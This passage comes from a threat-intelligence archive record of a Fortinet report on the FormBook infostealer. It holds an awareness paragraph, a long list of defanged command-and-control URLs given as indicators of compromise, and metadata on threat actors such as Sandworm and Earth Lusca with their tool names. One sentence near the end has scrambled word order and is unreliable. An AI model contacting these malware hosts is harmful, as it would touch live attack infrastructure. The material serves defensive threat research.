and stay informed of new and emerging threats.\r\nWe also suggest our readers go through the free NSE training: NSE 1 – Information Security Awareness, a module\r\non Internet threats designed to help end users learn how to identify and protect themselves from phishing attacks.\r\nIf you believe this or any other cybersecurity threat has impacted your organization, please contact our Global\r\nFortiGuard Incident Response Team.\r\nIOCs\r\nC2 Server URLs:\r\nhxxp://www[.]arwintarim[.]xyz/shoy/\r\nhxxp://www[.]promutuus[.]xyz/bpae/\r\nhxxp://www[.]218735[.]bid/3f5o/\r\nhxxp://www[.]vivamente[.]shop/xr41/\r\nhxxp://www[.]segurooshop[.]shop/wcz8/\r\nhxxp://www[.]hugeblockchain[.]xyz/1dpy/\r\nhxxp://www[.]crazymeme[.]xyz/78bm/\r\nhxxp://www[.]extremedoge[.]xyz/372c/\r\nhxxp://www[.]685648[.]wang/3k4m/\r\nhxxp://www[.]shibfestival[.]xyz/8538/\r\nhxxp://www[.]promoconfortbaby[.]store/1pxl/\r\nhxxp://www[.]balivegasbaru2[.]xyz/cfze/\r\nhxxp://www[.]themutznuts[.]xyz/ks15/\r\nhxxp://www[.]kpilal[.]info/9o26/\r\nhxxp://www[.]dogeeditor[.]xyz/x5dz/\r\nhxxp://www[.]adjokctp[.]icu/3ya5/\r\nhxxp://www[.]kasun[.]wtf/u4ue/\r\nhxxp://www[.]031235246[.]xyz/ml07/\r\nhxxp://www[.]intention[.]digital/h6z3/\r\nhxxp://www[.]prepaidbitcoin[.]xyz/rcx4/\r\nhxxp://www[.]ddvids[.]xyz/uiki/\r\nhxxp://www[.]zhuanphysical[.]shop/zcro/\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 27 of 29\n\nhxxp://www[.]theweb[.]services/fb40/\r\nhxxp://www[.]sdwd[.]wang/sfv4/\r\nhxxp://www[.]lucynoel6465[.]shop/1i64/\r\nhxxp://www[.]nhc7tdkp6[.]live/d9kr/\r\nhxxp://www[.]ciptaan[.]xyz/fjwa/\r\nhxxp://www[.]gluconolmx[.]shop/8370/\r\nhxxp://www[.]shlomi[.]app/5nwk/\r\nhxxp://www[.]garfo[.]xyz/35rt/\r\nhxxp://www[.]caral[.]tokyo/plub/\r\nhxxp://www[.]meritking[.]cloud/gakd/\r\nhxxp://www[.]grcgrg[.]net/jxyu/\r\nhxxp://www[.]nullus[.]xyz/pf7y/\r\nhxxp://www[.]actionlow[.]live/0a0g/\r\nhxxp://www[.]dangky88kfree[.]online/11lg/\r\nhxxp://www[.]szty13[.]vip/abhi/\r\nhxxp://www[.]arryongro-nambe[.]live/h108/\r\nhxxp://www[.]dqvcbn[.]info/iby8/\r\nhxxp://www[.]svapo-discount[.]net/s956/\r\nhxxp://www[.]yueolt[.]shop/je6k/\r\nhxxp://www[.]sigaque[.]today/u2nq/\r\nhxxp://www[.]manicure-nano[.]sbs/xkx8/\r\nhxxp://www[.]laohuc58[.]net/zyjq/\r\nhxxp://www[.]iighpb[.]bid/jfhd/\r\nhxxp://www[.]fjlgyc[.]info/txra/\r\nhxxp://www[.]sbualdwhryi[.]info/dbdy/\r\nhxxp://www[.]xrrkkv[.]info/eg97/\r\nhxxp://www[.]08081[.]pink/2wr9/\r\nhxxp://www[.]jyc11[.]top/xz2s/\r\nhxxp://www[.]kdjsswzx[.]club/h3ut/\r\nhxxp://www[.]gnlokn[.]info/lmor/\r\nhxxp://www[.]btbjpu[.]info/pjhe/\r\nhxxp://www[.]bellysweep[.]net/gr1r/\r\nhxxp://www[.]dilgxp[.]info/7qht/\r\nhxxp://www[.]leveledge[.]sbs/asbs/\r\nhxxp://www[.]ethereumpartner[.]xyz/xou3/\r\nhxxp://www[.]choujiezhibo[.]net/pu7t/\r\nhxxp://www[.]domuss[.]asia/yf4f/\r\nhxxp://www[.]seasay[.]xyz/xwy3/\r\nhxxp://www[.]tumbetgirislinki[.]fit/i8hk/\r\nhxxp://www[.]ef4refef[.]sbs/f88b/\r\nhxxp://www[.]aicycling[.]pro/4m7q/\r\nhxxp://www[.]autonomousrich[.]xyz/iej0/\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 28 of 29\n\nSource: https://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nhttps://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign\r\nPage 29 of 29\n\nMy analysis real FormBook reveals that the copied but instead serves FormBook is as a decryption re-encrypted. The routine. The encrypted code initially executed data begins does not at offset 0x6E36C3 belong to the (with\nFormBook loaded at 0x6E0000), and the encrypted data size is hard coded to 0x43600, as illustrated in Figure 1.\n Page 1 of 29", "extraction_quality": 1, "language": "EN", "sources": [ "Malpedia" ], "references": [ "https://www.fortinet.com/blog/threat-research/infostealer-malware-formbook-spread-via-phishing-campaign" ], "report_names": [ "infostealer-malware-formbook-spread-via-phishing-campaign" ], "threat_actors": [ { "id": "0661a292-80f3-420b-9951-a50e03c831c0", "created_at": "2023-01-06T13:46:38.928796Z", "updated_at": "2026-04-10T02:00:03.148052Z", "deleted_at": null, "main_name": "IRIDIUM", "aliases": [], "source_name": "MISPGALAXY:IRIDIUM", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "9f101d9c-05ea-48b9-b6f1-168cd6d06d12", "created_at": "2023-01-06T13:46:39.396409Z", "updated_at": "2026-04-10T02:00:03.312816Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "CHROMIUM", "ControlX", "TAG-22", "BRONZE UNIVERSITY", "AQUATIC PANDA", "RedHotel", "Charcoal Typhoon", "Red Scylla", "Red Dev 10", "BountyGlad" ], "source_name": "MISPGALAXY:Earth Lusca", "tools": [ "RouterGod", "SprySOCKS", "ShadowPad", "POISONPLUG", "Barlaiy", "Spyder", "FunnySwitch" ], "source_id": "MISPGALAXY", "reports": null }, { "id": "8941e146-3e7f-4b4e-9b66-c2da052ee6df", "created_at": "2023-01-06T13:46:38.402513Z", "updated_at": "2026-04-10T02:00:02.959797Z", "deleted_at": null, "main_name": "Sandworm", "aliases": [ "IRIDIUM", "Blue Echidna", "VOODOO BEAR", "FROZENBARENTS", "UAC-0113", "Seashell Blizzard", "UAC-0082", "APT44", "Quedagh", "TEMP.Noble", "IRON VIKING", "G0034", "ELECTRUM", "TeleBots" ], "source_name": "MISPGALAXY:Sandworm", "tools": [], "source_id": "MISPGALAXY", "reports": null }, { "id": "7bd810cb-d674-4763-86eb-2cc182d24ea0", "created_at": "2022-10-25T16:07:24.1537Z", "updated_at": "2026-04-10T02:00:04.883793Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "APT 44", "ATK 14", "BE2", "Blue Echidna", "CTG-7263", "FROZENBARENTS", "G0034", "Grey Tornado", "IRIDIUM", "Iron Viking", "Quedagh", "Razing Ursa", "Sandworm", "Sandworm Team", "Seashell Blizzard", "TEMP.Noble", "UAC-0082", "UAC-0113", "UAC-0125", "UAC-0133", "Voodoo Bear" ], "source_name": "ETDA:Sandworm Team", "tools": [ "AWFULSHRED", "ArguePatch", "BIASBOAT", "Black Energy", "BlackEnergy", "CaddyWiper", "Colibri Loader", "Cyclops Blink", "CyclopsBlink", "DCRat", "DarkCrystal RAT", "Fobushell", "GOSSIPFLOW", "Gcat", "IcyWell", "Industroyer2", "JaguarBlade", "JuicyPotato", "Kapeka", "KillDisk.NCX", "LOADGRIP", "LOLBAS", "LOLBins", "Living off the Land", "ORCSHRED", "P.A.S.", "PassKillDisk", "Pitvotnacci", "PsList", "QUEUESEED", "RansomBoggs", "RottenPotato", "SOLOSHRED", "SwiftSlicer", "VPNFilter", "Warzone", "Warzone RAT", "Weevly" ], "source_id": "ETDA", "reports": null }, { "id": "75455540-2f6e-467c-9225-8fe670e50c47", "created_at": "2022-10-25T16:07:23.740266Z", "updated_at": "2026-04-10T02:00:04.732992Z", "deleted_at": null, "main_name": "Iridium", "aliases": [], "source_name": "ETDA:Iridium", "tools": [ "CHINACHOPPER", "China Chopper", "LazyCat", "Powerkatz", "SinoChopper", "reGeorg" ], "source_id": "ETDA", "reports": null }, { "id": "a66438a8-ebf6-4397-9ad5-ed07f93330aa", "created_at": "2022-10-25T16:47:55.919702Z", "updated_at": "2026-04-10T02:00:03.618194Z", "deleted_at": null, "main_name": "IRON VIKING", "aliases": [ "APT44 ", "ATK14 ", "BlackEnergy Group", "Blue Echidna ", "CTG-7263 ", "ELECTRUM ", "FROZENBARENTS ", "Hades/OlympicDestroyer ", "IRIDIUM ", "Qudedagh ", "Sandworm Team ", "Seashell Blizzard ", "TEMP.Noble ", "Telebots ", "Voodoo Bear " ], "source_name": "Secureworks:IRON VIKING", "tools": [ "BadRabbit", "BlackEnergy", "GCat", "NotPetya", "PSCrypt", "TeleBot", "TeleDoor", "xData" ], "source_id": "Secureworks", "reports": null }, { "id": "18a7b52d-a1cd-43a3-8982-7324e3e676b7", "created_at": "2025-08-07T02:03:24.688416Z", "updated_at": "2026-04-10T02:00:03.734754Z", "deleted_at": null, "main_name": "BRONZE UNIVERSITY", "aliases": [ "Aquatic Panda", "Aquatic Panda ", "CHROMIUM", "CHROMIUM ", "Charcoal Typhoon", "Charcoal Typhoon ", "Earth Lusca", "Earth Lusca ", "FISHMONGER ", "Red Dev 10", "Red Dev 10 ", "Red Scylla", "Red Scylla ", "RedHotel", "RedHotel ", "Tag-22", "Tag-22 " ], "source_name": "Secureworks:BRONZE UNIVERSITY", "tools": [ "Cobalt Strike", "Fishmaster", "FunnySwitch", "Spyder", "njRAT" ], "source_id": "Secureworks", "reports": null }, { "id": "6abcc917-035c-4e9b-a53f-eaee636749c3", "created_at": "2022-10-25T16:07:23.565337Z", "updated_at": "2026-04-10T02:00:04.668393Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Bronze University", "Charcoal Typhoon", "Chromium", "G1006", "Red Dev 10", "Red Scylla" ], "source_name": "ETDA:Earth Lusca", "tools": [ "Agentemis", "AntSword", "BIOPASS", "BIOPASS RAT", "BadPotato", "Behinder", "BleDoor", "Cobalt Strike", "CobaltStrike", "Doraemon", "FRP", "Fast Reverse Proxy", "FunnySwitch", "HUC Port Banner Scanner", "KTLVdoor", "Mimikatz", "NBTscan", "POISONPLUG.SHADOW", "PipeMon", "RbDoor", "RibDoor", "RouterGod", "SAMRID", "ShadowPad Winnti", "SprySOCKS", "WinRAR", "Winnti", "XShellGhost", "cobeacon", "fscan", "lcx", "nbtscan" ], "source_id": "ETDA", "reports": null }, { "id": "d53593c3-2819-4af3-bf16-0c39edc64920", "created_at": "2022-10-27T08:27:13.212301Z", "updated_at": "2026-04-10T02:00:05.272802Z", "deleted_at": null, "main_name": "Earth Lusca", "aliases": [ "Earth Lusca", "TAG-22", "Charcoal Typhoon", "CHROMIUM", "ControlX" ], "source_name": "MITRE:Earth Lusca", "tools": [ "Mimikatz", "PowerSploit", "Tasklist", "certutil", "Cobalt Strike", "Winnti for Linux", "Nltest", "NBTscan", "ShadowPad" ], "source_id": "MITRE", "reports": null }, { "id": "b3e954e8-8bbb-46f3-84de-d6f12dc7e1a6", "created_at": "2022-10-25T15:50:23.339976Z", "updated_at": "2026-04-10T02:00:05.27483Z", "deleted_at": null, "main_name": "Sandworm Team", "aliases": [ "Sandworm Team", "ELECTRUM", "Telebots", "IRON VIKING", "BlackEnergy (Group)", "Quedagh", "Voodoo Bear", "IRIDIUM", "Seashell Blizzard", "FROZENBARENTS", "APT44" ], "source_name": "MITRE:Sandworm Team", "tools": [ "Bad Rabbit", "Mimikatz", "Exaramel for Linux", "Exaramel for Windows", "GreyEnergy", "PsExec", "Prestige", "P.A.S. Webshell", "AcidPour", "VPNFilter", "Neo-reGeorg", "Cyclops Blink", "SDelete", "Kapeka", "AcidRain", "Industroyer", "Industroyer2", "BlackEnergy", "Cobalt Strike", "NotPetya", "KillDisk", "PoshC2", "Impacket", "Invoke-PSImage", "Olympic Destroyer" ], "source_id": "MITRE", "reports": null } ], "ts_created_at": 1775434365, "ts_updated_at": 1775792228, "ts_creation_date": 0, "ts_modification_date": 0, "files": { "pdf": "https://archive.orkl.eu/6f152f291107aa70fae888d111633b34ed37ff8c.pdf", "text": "https://archive.orkl.eu/6f152f291107aa70fae888d111633b34ed37ff8c.txt", "img": "https://archive.orkl.eu/6f152f291107aa70fae888d111633b34ed37ff8c.jpg" } }